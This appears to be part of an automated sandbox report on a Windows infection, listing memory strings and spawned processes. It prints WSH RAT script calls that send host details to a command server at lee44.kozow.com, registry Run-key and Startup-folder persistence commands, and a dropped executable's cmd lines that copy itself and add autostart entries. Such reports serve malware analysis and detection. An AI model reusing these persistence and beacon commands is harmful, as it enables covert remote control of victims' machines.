                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}memstr_24f11995-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}pr1mpsmemstr_be2c1356-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windo`ememstr_b8e0ecac-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @tzres.dll,-112xmemstr_dee6b288-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eastern standard time %memstr_1265da8e-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @tzres.dll,-111memstr_b4a4dceb-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eastern summer timememstr_e7d28c66-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllwbmemstr_2198018a-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemprox.dlllmemstr_4d376a3e-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemdisp.dllrosoftmemstr_2128f178-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemdisp.dlllmemstr_aeb1871d-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemdisp.dll0vmemstr_27fe67ed-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k.$xdmemstr_f2b80722-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wmiutils.dlllmemstr_ff5e992b-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wmiutils.dllrmemstr_98097dee-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wmiutils.dlll\jonmemstr_4f3ca749-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemprox.dlll782memstr_8355c298-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: security=impersonation dynamic falsen\jmemstr_893bab15-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppdaomemstr_3543b7a1-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemprox.dlll@memstr_a10bb4a0-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \device\harddiskvolume3wmemstr_8341e501-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\kmemstr_03aa987c-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemsvc.dlllmemstr_14252a92-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows management and instrumentationmemstr_da4ec2f2-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \jon;memstr_c3e4194a-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\wbemdisp.dlllc:memstr_ce56a759-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thoodell32memstr_a7a48a65-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,-21786memstr_ec47be0a-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,dmimemstr_422c42c5-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbem locatormemstr_e22682a4-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '$'<'memstr_c2b255bc-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmnopqrsmemstr_3c813b02-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b81a4609memstr_2ed71821-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmi object factorymemstr_984f87ca-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >4>d>memstr_fb2b08ab-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l0l@lxlplmemstr_109a4dc0-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m$m@m`mmemstr_fc42a1dc-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: acdefghijmemstr_a9f7d4b4-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jonesimv2memstr_de2e6e24-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b81a46092memstr_eacd21c1-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jones-pc2qmemstr_bc405e78-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stujwxyzmemstr_036a14b1-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6892typememstr_8b2dc245-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psfactorybuffermemstr_9adddd81-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: universal refresher8memstr_8a933936-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\system+memstr_1166acf9-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata\local&memstr_f2696760-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbem class object memstr_53a41433-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: call contextd=xmemstr_b0c30590-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local appdata-21786memstr_67e0adbd-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l32.dll,memstr_c0e2774d-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^lb&!memstr_00fbd412-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hthe download of the specified resource has failed.memstr_e8e3526d-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware\microsoft\windows\currentversion\run\adobe".memstr_93b347c5-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ones\appdata\rmemstr_a77dced6-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".rmemstr_8df1b625-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"rosoft\windows\currentversion\run\adobe".ememstr_dcc392ad-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".tmemstr_519c90ab-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".gmemstr_caf5fb99-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"memstr_e0ec685f-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windows\currentversion\run\adobe".imemstr_b7478977-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run\adobedows\currentversion\run\adobe".memstr_834620d3-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run\adobendows\currentversion\run\adobe".+memstr_7af2780a-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >microsoft jscript runtime errorey_local_machine\software\microsoft\windows\currentversion\run\adobe".imemstr_baa77729-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware\microsoft\windows\currentversion\run\adobe".imemstr_eb48b557-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware\microsoft\windows\currentversion\run\adobe".dmemstr_7c0f330f-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".favoriteswmemstr_927ef14d-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".;memstr_14fd63aa-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".*memstr_743aad46-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0ontsmemstr_5e29749a-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::$datas@shell32.dll,-21813memstr_f6ba610c-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystem3.drives();memstr_0c4097dc-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrivecollection._newenum();memstr_50f67083-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.isready();memstr_e7c66ea4-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.freespace();memstr_3243ce99-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrive.drivetype();memstr_f7249dad-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.open("post", "http://lee44.kozow.com:6892/is-ready", "false");memstr_a910c877-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.setrequestheader("user-agent:", "wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav");memstr_d29e70d6-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iserverxmlhttprequest2.send("");memstr_0af4a07a-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ihost.sleep("5000");memstr_fe6cad85-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell3.regwrite("hkey_current_user\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz");memstr_da0362c8-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell3.regwrite("hkey_local_machine\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz");memstr_9e010d45-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ihost.scriptfullname();memstr_67585228-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\local\temp\adobe.js", "true");memstr_c20cee8a-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\st", "true");memstr_17c43e61-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows 10 pro|plus|windows defender .|false - 15/4/2025|jav");memstr_6f8b09ab-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: on._newenum();memstr_c01b0a69-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::$dataon._newenum();memstr_8864aa06-f
                            Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: m32\gdi3pmemstr_8abb32f4-a
                            Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: +local\sm0:5872:304:wilstaging_02_p0hlmemstr_120b6f71-5
                            Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: `p@ramemstr_931592ce-8
                            Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: /5rrmemstr_e5cc213c-2
                            Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wsh-timermemstr_b22a05ee-e
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: {7584717 -memstr_f2513939-a
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 16bd0}memstr_35fb5f1b-a
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini/hmemstr_68efbcdf-6
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \microsoft\wmemstr_be1fe8f8-1
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dows\start menu\rams\startupmemstr_aa4dcb85-5
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: {7584717memstr_26094694-5
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.inimemstr_64d228a0-d
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dows\start menu\rams6memstr_9d9b06d5-1
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: :hg/hmemstr_31ed5f75-c
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ++c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.inimemstr_b7deb3de-f
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \pk/hmemstr_1a16cd20-a
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: em32\she memstr_0f3d0643-e
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: zdwptmemstr_c7091b58-5
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: programsmemstr_dc32ff98-0
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: @da\r @memstr_bf8ed880-4
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: @shell32.dll,-21782memstr_e10cfa61-0
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \user\appdata\roaming\mmemstr_8bdb8fb2-d
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 476751002memstr_253ef14f-2
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: @at}0memstr_a8b6d860-3
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ntfstmemstr_517b911a-c
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\adobe.jsmemstr_d92382f5-8
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: p^/@nmemstr_59add5eb-6
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 3++s++memstr_832dc305-e
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: the specified resource hmemstr_84e7db63-9
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dvm<imemstr_08a90107-1
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: sleepmemstr_5f13d8af-5
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wc:\users\user\appdata\local\temp\adobe.js'rmemstr_261eca8e-2
                            Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wscript.exememstr_cbc13aba-7
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 247675102476751002memstr_3c7b3248-0
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s-1-5-21-2246122658-3693405117-24767memstr_861a7809-5
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 2476751002memstr_08586e71-e
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tdll.dllmemstr_a01fee1b-e
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: lee44.kozow.commemstr_ffdf08bc-5
                            Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: prxyh#memstr_1dd1ea74-4
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"memstr_027be00a-5
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: glxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"memstr_6a027d1e-5
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: otc:\users\user\appdata\local\temp\adobe.jsal\temp\adobememstr_7b4d00ba-f
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"ngsng[memstr_bd7c84e6-b
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .tc:\users\user\appdata\local\temp\adobe.jsal\temp\adobememstr_eb8ab546-e
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\JaG.exe "C:\Users\user\AppData\Local\Temp\JaG.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe"Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\JaG.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
